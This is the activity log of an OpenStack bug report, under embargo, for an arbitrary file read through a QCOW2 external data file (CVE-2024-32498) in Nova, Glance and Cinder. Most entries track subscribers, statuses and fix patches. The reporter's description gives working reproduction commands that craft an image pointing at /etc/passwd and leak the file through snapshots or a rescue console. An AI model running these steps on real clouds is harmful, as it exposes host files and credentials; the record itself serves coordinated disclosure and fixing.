2024-03-29 19:31:33 |
Martin Kaesberger |
bug |
|
|
added bug |
2024-03-30 16:59:25 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-06-28 and will be made
public by or on that date even if no fix is identified.
OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`.
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`.
- The file content starts at guest cluster 0.
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and log in to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
|
2024-03-30 17:00:04 |
Jeremy Stanley |
bug task added |
|
ossa |
|
2024-03-30 17:00:11 |
Jeremy Stanley |
ossa: status |
New |
Incomplete |
|
2024-03-30 17:00:48 |
Jeremy Stanley |
bug |
|
|
added subscriber Nova Core security contacts |
2024-04-01 14:44:35 |
Dan Smith |
attachment added |
|
nova-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761072/+files/nova-2059809.patch |
|
2024-04-01 15:09:47 |
Dan Smith |
attachment added |
|
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761103/+files/glance-2059809.patch |
|
2024-04-01 15:38:32 |
Dan Smith |
attachment added |
|
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761104/+files/glance-2059809.patch |
|
2024-04-01 15:39:09 |
Dan Smith |
attachment removed |
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761103/+files/glance-2059809.patch |
|
|
2024-04-01 15:40:42 |
Dan Smith |
bug task added |
|
glance |
|
2024-04-01 15:40:55 |
Dan Smith |
bug task added |
|
cinder |
|
2024-04-01 15:41:21 |
Dan Smith |
bug |
|
|
added subscriber Brian Rosmaita |
2024-04-01 18:17:21 |
Brian Rosmaita |
bug |
|
|
added subscriber Eric Harney |
2024-04-01 21:14:14 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761133/+files/cinder-2059809.patch |
|
2024-04-01 21:20:27 |
Brian Rosmaita |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761133/+files/cinder-2059809.patch |
|
|
2024-04-01 21:22:39 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761134/+files/cinder-2059809.patch |
|
2024-04-02 12:44:34 |
Brian Rosmaita |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761134/+files/cinder-2059809.patch |
|
|
2024-04-02 12:45:09 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761279/+files/cinder-2059809.patch |
|
2024-04-02 12:49:04 |
Jeremy Stanley |
bug |
|
|
added subscriber Arnaud Morin |
2024-04-02 12:49:16 |
Jeremy Stanley |
bug |
|
|
added subscriber Guillaume Espanel |
2024-04-02 12:49:28 |
Jeremy Stanley |
bug |
|
|
added subscriber Pierre-Samuel LE STANG |
2024-04-02 12:49:43 |
Jeremy Stanley |
bug |
|
|
added subscriber Pierre Libeau |
2024-04-02 13:08:06 |
Jeremy Stanley |
bug |
|
|
added subscriber Julien LE JEUNE |
2024-04-02 13:19:00 |
Arnaud Morin |
attachment added |
|
nova.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761287/+files/nova.patch |
|
2024-04-02 13:19:22 |
Arnaud Morin |
attachment added |
|
glance.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761288/+files/glance.patch |
|
2024-04-02 13:19:47 |
Arnaud Morin |
attachment added |
|
cinder.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761289/+files/cinder.patch |
|
2024-04-03 12:10:01 |
Brian Rosmaita |
cinder: status |
New |
In Progress |
|
2024-04-03 12:10:05 |
Brian Rosmaita |
cinder: importance |
Undecided |
Critical |
|
2024-04-03 12:10:10 |
Brian Rosmaita |
cinder: assignee |
|
Brian Rosmaita (brian-rosmaita) |
|
2024-04-03 12:10:34 |
Brian Rosmaita |
glance: status |
New |
In Progress |
|
2024-04-03 12:10:37 |
Brian Rosmaita |
glance: importance |
Undecided |
Critical |
|
2024-04-03 12:11:06 |
Brian Rosmaita |
glance: assignee |
|
Dan Smith (danms) |
|
2024-04-03 12:11:12 |
Brian Rosmaita |
nova: status |
New |
In Progress |
|
2024-04-03 14:39:03 |
Dan Smith |
attachment added |
|
nova-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761473/+files/nova-2024.1-2059809.patch |
|
2024-04-03 14:39:25 |
Dan Smith |
attachment added |
|
nova-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761474/+files/nova-2023.2-2059809.patch |
|
2024-04-03 14:39:46 |
Dan Smith |
attachment added |
|
nova-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761475/+files/nova-2023.1-2059809.patch |
|
2024-04-03 14:39:59 |
Dan Smith |
attachment added |
|
nova-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761476/+files/nova-zed-2059809.patch |
|
2024-04-03 14:43:39 |
Dan Smith |
attachment added |
|
glance-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761477/+files/glance-2024.1-2059809.patch |
|
2024-04-03 14:44:01 |
Dan Smith |
attachment added |
|
glance-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761478/+files/glance-2023.2-2059809.patch |
|
2024-04-03 14:44:21 |
Dan Smith |
attachment added |
|
glance-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761479/+files/glance-2023.1-2059809.patch |
|
2024-04-03 14:44:37 |
Dan Smith |
attachment added |
|
glance-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761480/+files/glance-zed-2059809.patch |
|
2024-04-03 16:06:57 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2024.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761489/+files/cinder-2059809-2024.1.patch |
|
2024-04-03 16:08:07 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2023.2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761490/+files/cinder-2059809-2023.2.patch |
|
2024-04-03 16:08:47 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2023.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761491/+files/cinder-2059809-2023.1.patch |
|
2024-04-03 16:09:40 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-zed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761492/+files/cinder-2059809-zed.patch |
|
2024-04-03 16:10:41 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-yoga.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761493/+files/cinder-2059809-yoga.patch |
|
2024-04-05 18:40:46 |
Jeremy Stanley |
ossa: status |
Incomplete |
Confirmed |
|
2024-04-05 18:40:52 |
Jeremy Stanley |
ossa: importance |
Undecided |
High |
|
2024-04-05 18:40:57 |
Jeremy Stanley |
ossa: assignee |
|
Jeremy Stanley (fungi) |
|
2024-04-05 18:41:22 |
Jeremy Stanley |
ossa: status |
Confirmed |
Triaged |
|
2024-04-05 19:39:58 |
Jeremy Stanley |
ossa: status |
Triaged |
In Progress |
|
2024-04-07 22:46:48 |
Martin Kaesberger |
attachment added |
|
qmp.sh https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761999/+files/qmp.sh |
|
2024-04-12 16:58:55 |
Brian Rosmaita |
bug |
|
|
added subscriber Cinder Core security contacts |
2024-04-15 12:53:46 |
Jeremy Stanley |
cve linked |
|
2024-32498 |
|
2024-04-16 19:05:04 |
Dan Smith |
attachment added |
|
glance-format-inspector-extend.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766361/+files/glance-format-inspector-extend.patch |
|
2024-04-16 19:05:17 |
Dan Smith |
attachment added |
|
glance-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766362/+files/glance-use-format-inspector-for-detect.patch |
|
2024-04-17 13:48:58 |
Dan Smith |
attachment removed |
nova-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761072/+files/nova-2059809.patch |
|
|
2024-04-17 13:49:12 |
Dan Smith |
attachment removed |
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761104/+files/glance-2059809.patch |
|
|
2024-04-17 13:49:17 |
Dan Smith |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761279/+files/cinder-2059809.patch |
|
|
2024-04-17 13:49:45 |
Dan Smith |
attachment removed |
nova-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761473/+files/nova-2024.1-2059809.patch |
|
|
2024-04-17 13:49:49 |
Dan Smith |
attachment removed |
nova-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761474/+files/nova-2023.2-2059809.patch |
|
|
2024-04-17 13:49:53 |
Dan Smith |
attachment removed |
nova-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761475/+files/nova-2023.1-2059809.patch |
|
|
2024-04-17 13:49:58 |
Dan Smith |
attachment removed |
nova-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761476/+files/nova-zed-2059809.patch |
|
|
2024-04-17 13:50:03 |
Dan Smith |
attachment removed |
glance-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761477/+files/glance-2024.1-2059809.patch |
|
|
2024-04-17 13:50:09 |
Dan Smith |
attachment removed |
glance-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761478/+files/glance-2023.2-2059809.patch |
|
|
2024-04-17 13:50:13 |
Dan Smith |
attachment removed |
glance-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761479/+files/glance-2023.1-2059809.patch |
|
|
2024-04-17 13:50:19 |
Dan Smith |
attachment removed |
glance-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761480/+files/glance-zed-2059809.patch |
|
|
2024-04-17 14:39:15 |
Dan Smith |
attachment added |
|
nova-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766810/+files/nova-use-format-inspector-for-detect.patch |
|
2024-04-18 16:00:06 |
Dan Smith |
attachment added |
|
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767542/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
2024-04-18 16:00:39 |
Dan Smith |
attachment added |
|
0001-Check-QCOW-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767543/+files/0001-Check-QCOW-images-with-format_inspector-for-safety.patch |
|
2024-04-18 16:00:55 |
Dan Smith |
attachment removed |
glance-format-inspector-extend.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766361/+files/glance-format-inspector-extend.patch |
|
|
2024-04-18 16:01:00 |
Dan Smith |
attachment removed |
nova-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766810/+files/nova-use-format-inspector-for-detect.patch |
|
|
2024-04-19 18:30:55 |
Dan Smith |
attachment removed |
glance-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766362/+files/glance-use-format-inspector-for-detect.patch |
|
|
2024-04-19 18:31:02 |
Dan Smith |
attachment removed |
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767542/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
|
2024-04-19 18:31:46 |
Dan Smith |
attachment added |
|
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768360/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
2024-04-19 18:33:35 |
Dan Smith |
attachment added |
|
0002-Add-VMDK-safety-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768361/+files/0002-Add-VMDK-safety-check.patch |
|
2024-04-19 18:38:29 |
Dan Smith |
attachment added |
|
0003-Reject-unsafe-qcow-and-vmdk-files.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768365/+files/0003-Reject-unsafe-qcow-and-vmdk-files.patch |
|
2024-04-22 17:38:04 |
Dan Smith |
attachment added |
|
0001-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5769490/+files/0001-Check-images-with-format_inspector-for-safety.patch |
|
2024-05-01 17:04:29 |
Dan Smith |
attachment removed |
0001-Check-QCOW-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767543/+files/0001-Check-QCOW-images-with-format_inspector-for-safety.patch |
|
|
2024-05-01 17:04:42 |
Dan Smith |
attachment removed |
0001-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5769490/+files/0001-Check-images-with-format_inspector-for-safety.patch |
|
|
2024-05-01 17:05:20 |
Dan Smith |
attachment added |
|
0001-Reject-qcow-files-with-data-file-attributes.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773705/+files/0001-Reject-qcow-files-with-data-file-attributes.patch |
|
2024-05-01 17:06:51 |
Dan Smith |
attachment added |
|
0002-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773706/+files/0002-Check-images-with-format_inspector-for-safety.patch |
|
2024-06-04 17:16:46 |
Dan Smith |
attachment removed |
0001-Reject-qcow-files-with-data-file-attributes.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773705/+files/0001-Reject-qcow-files-with-data-file-attributes.patch |
|
|
2024-06-04 17:16:56 |
Dan Smith |
attachment removed |
0002-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773706/+files/0002-Check-images-with-format_inspector-for-safety.patch |
|
|
2024-06-04 17:19:50 |
Dan Smith |
attachment added |
|
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785885/+files/nova_bug_2059809-master.patch |
|
2024-06-04 17:20:09 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785886/+files/nova_backport-FI_bug_2059809-origin_stable_2023.2.patch |
|
2024-06-04 17:20:27 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785887/+files/nova_backport-FI_bug_2059809-origin_stable_2023.1.patch |
|
2024-06-04 17:25:45 |
Dan Smith |
attachment removed |
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768360/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
|
2024-06-04 17:25:50 |
Dan Smith |
attachment removed |
0002-Add-VMDK-safety-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768361/+files/0002-Add-VMDK-safety-check.patch |
|
|
2024-06-04 17:25:54 |
Dan Smith |
attachment removed |
0003-Reject-unsafe-qcow-and-vmdk-files.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768365/+files/0003-Reject-unsafe-qcow-and-vmdk-files.patch |
|
|
2024-06-04 17:27:09 |
Dan Smith |
attachment added |
|
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785888/+files/glance_bug_2059809-master.patch |
|
2024-06-04 17:27:31 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785889/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.2.patch |
|
2024-06-04 17:27:48 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785890/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.1.patch |
|
2024-06-11 14:39:25 |
Dan Smith |
bug |
|
|
added subscriber Abhishek Kekane |
2024-06-13 13:31:08 |
Dan Smith |
bug |
|
|
added subscriber Luigi Toscano |
2024-06-18 16:06:43 |
Brian Rosmaita |
bug |
|
|
added subscriber Luigi Toscano |
2024-06-18 16:07:33 |
Dan Smith |
removed subscriber Luigi Toscano |
|
|
|
2024-06-18 16:32:29 |
Jeremy Stanley |
summary |
Arbitrary file access through QCOW2 external data file |
Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
|
2024-06-18 17:20:03 |
Dan Smith |
bug |
|
|
added subscriber Nick Tait |
2024-06-20 23:54:38 |
Jeremy Stanley |
bug |
|
|
added subscriber Mohammed Naser |
2024-06-21 12:24:27 |
Jeremy Stanley |
bug |
|
|
added subscriber Dr. Jens Harbott |
2024-06-21 12:25:05 |
Jeremy Stanley |
bug |
|
|
added subscriber Jake Yip |
2024-06-21 12:25:27 |
Jeremy Stanley |
bug |
|
|
added subscriber Kurt Garloff |
2024-06-21 12:25:46 |
Jeremy Stanley |
bug |
|
|
added subscriber Felix Kronlage-Dammers |
2024-06-21 12:26:03 |
Jeremy Stanley |
bug |
|
|
added subscriber simon stephan |
2024-06-21 12:26:21 |
Jeremy Stanley |
bug |
|
|
added subscriber Maximilian Stinsky |
2024-06-21 12:26:39 |
Jeremy Stanley |
bug |
|
|
added subscriber Pavlo Shchelokovskyy |
2024-06-21 12:26:55 |
Jeremy Stanley |
bug |
|
|
added subscriber Michal Arbet |
2024-06-21 15:56:27 |
Martin Kaesberger |
cve linked |
|
2024-4467 |
|
2024-06-21 16:28:11 |
Jeremy Stanley |
bug |
|
|
added subscriber Jitendra Ahuja |
2024-06-21 16:28:35 |
Jeremy Stanley |
bug |
|
|
added subscriber Zack Miele |
2024-06-24 00:27:21 |
Jake Yip |
bug |
|
|
added subscriber Sam Morrison |
2024-06-24 13:58:01 |
Jeremy Stanley |
bug |
|
|
added subscriber Felix Huettner |
2024-06-24 14:53:56 |
Dan Smith |
attachment removed |
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785888/+files/glance_bug_2059809-master.patch |
|
|
2024-06-24 14:54:01 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785889/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.2.patch |
|
|
2024-06-24 14:54:07 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785890/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.1.patch |
|
|
2024-06-24 14:55:23 |
Dan Smith |
attachment added |
|
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792016/+files/glance-master-2059809.patch |
|
2024-06-24 14:56:01 |
Dan Smith |
attachment added |
|
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792017/+files/glance-2024.1-2059809.patch |
|
2024-06-24 14:56:25 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792018/+files/glance-2023.2-2059809.patch |
|
2024-06-24 14:56:47 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792022/+files/glance-2023.1-2059809.patch |
|
2024-06-24 15:10:57 |
Dan Smith |
attachment removed |
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785885/+files/nova_bug_2059809-master.patch |
|
|
2024-06-24 15:11:02 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785886/+files/nova_backport-FI_bug_2059809-origin_stable_2023.2.patch |
|
|
2024-06-24 15:11:09 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785887/+files/nova_backport-FI_bug_2059809-origin_stable_2023.1.patch |
|
|
2024-06-24 15:11:41 |
Dan Smith |
attachment added |
|
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792026/+files/nova-master-2059809.patch |
|
2024-06-24 15:11:59 |
Dan Smith |
attachment added |
|
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792027/+files/nova-2024.1-2059809.patch |
|
2024-06-24 15:12:12 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792028/+files/nova-2023.2-2059809.patch |
|
2024-06-24 15:12:26 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792029/+files/nova-2023.1-2059809.patch |
|
2024-06-24 15:36:23 |
Jeremy Stanley |
bug |
|
|
added subscriber Thomas Goirand |
2024-06-24 17:35:38 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792045/+files/nova-master-2059809-additional.patch |
|
2024-06-24 18:11:53 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792045/+files/nova-master-2059809-additional.patch |
|
|
2024-06-24 18:27:44 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792046/+files/nova-master-2059809-additional.patch |
|
2024-06-25 04:59:44 |
Jake Yip |
bug |
|
|
added subscriber Shi Yan |
2024-06-25 06:52:49 |
Thomas Goirand |
attachment added |
|
add-missing-stuff.tar.gz https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792163/+files/add-missing-stuff.tar.gz |
|
2024-06-25 09:13:27 |
Felix Huettner |
bug |
|
|
added subscriber Jonas Schäfer |
2024-06-25 09:33:58 |
Jonas Schäfer |
bug |
|
|
added subscriber Konrad Gube |
2024-06-25 11:14:59 |
Felix Huettner |
attachment added |
|
cinder-master-additional-qemu-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792231/+files/cinder-master-additional-qemu-safety.patch |
|
2024-06-25 13:04:36 |
Felix Huettner |
attachment added |
|
cinder-master-additional-size-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792254/+files/cinder-master-additional-size-check.patch |
|
2024-06-25 14:02:43 |
Jeremy Stanley |
bug |
|
|
added subscriber Artem Goncharov |
2024-06-25 14:02:54 |
Jeremy Stanley |
bug |
|
|
added subscriber Michal Nasiadka |
2024-06-25 14:23:11 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792046/+files/nova-master-2059809-additional.patch |
|
|
2024-06-25 14:23:55 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792298/+files/nova-master-2059809-additional.patch |
|
2024-06-25 17:11:50 |
Dan Smith |
attachment added |
|
nova-2024.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792359/+files/nova-2024.1-2059809-additional.patch |
|
2024-06-25 17:12:04 |
Dan Smith |
attachment added |
|
nova-2023.2-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792361/+files/nova-2023.2-2059809-additional.patch |
|
2024-06-25 17:12:18 |
Dan Smith |
attachment added |
|
nova-2023.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792362/+files/nova-2023.1-2059809-additional.patch |
|
2024-06-25 20:01:59 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-07-02 and will be made
public by or on that date even if no fix is identified.
|
2024-06-25 20:58:05 |
Dan Smith |
attachment added |
|
cinder-additionals-fixed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792392/+files/cinder-additionals-fixed.patch |
|
2024-06-26 09:02:10 |
Sylvain Bauza |
nova: importance |
Undecided |
Critical |
|
2024-06-26 09:02:13 |
Sylvain Bauza |
nova: assignee |
|
Sylvain Bauza (sylvain-bauza) |
|
2024-06-26 09:37:30 |
Jonas Schäfer |
bug |
|
|
added subscriber Martin Morgenstern |
2024-06-26 12:17:30 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-master-WIP.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792616/+files/cinder-2059809-unified-master-WIP.patch |
|
2024-06-26 13:23:56 |
Jeremy Stanley |
bug |
|
|
added subscriber Tobias Urdin |
2024-06-26 14:49:17 |
Dan Smith |
bug |
|
|
added subscriber Alfredo Garcia |
2024-06-26 15:02:55 |
Thomas Goirand |
attachment added |
|
CVE-2024-32498_4_repair_unit_tests.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792632/+files/CVE-2024-32498_4_repair_unit_tests.patch |
|
2024-06-26 15:32:26 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-master-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792633/+files/cinder-2059809-unified-master-v2.txt |
|
2024-06-26 15:32:54 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2024.1-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792634/+files/cinder-2059809-unified-stable-2024.1-v2.txt |
|
2024-06-26 15:33:08 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2023.2-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792637/+files/cinder-2059809-unified-stable-2023.2-v2.txt |
|
2024-06-26 15:33:23 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2023.1-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792638/+files/cinder-2059809-unified-stable-2023.1-v2.txt |
|
2024-06-26 15:33:36 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-unmaintained-zed-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792639/+files/cinder-2059809-unified-unmaintained-zed-v2.txt |
|
2024-06-26 23:32:49 |
Jeremy Stanley |
bug |
|
|
added subscriber Benjamin Oliff |
2024-06-27 07:24:34 |
Thomas Goirand |
attachment added |
|
CVE-2024-32498-glance-victoria.tar.gz https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792737/+files/CVE-2024-32498-glance-victoria.tar.gz |
|
2024-06-27 07:24:45 |
Felix Huettner |
attachment added |
|
cinder-2059809-additional-tests-master.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792738/+files/cinder-2059809-additional-tests-master.patch |
|
2024-06-27 16:46:24 |
Dan Smith |
attachment added |
|
glance-master-2058089.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792869/+files/glance-master-2058089.patch |
|
2024-06-27 17:17:54 |
Dan Smith |
attachment removed |
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792026/+files/nova-master-2059809.patch |
|
|
2024-06-27 17:17:59 |
Dan Smith |
attachment removed |
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792027/+files/nova-2024.1-2059809.patch |
|
|
2024-06-27 17:18:04 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792028/+files/nova-2023.2-2059809.patch |
|
|
2024-06-27 17:18:10 |
Dan Smith |
attachment removed |
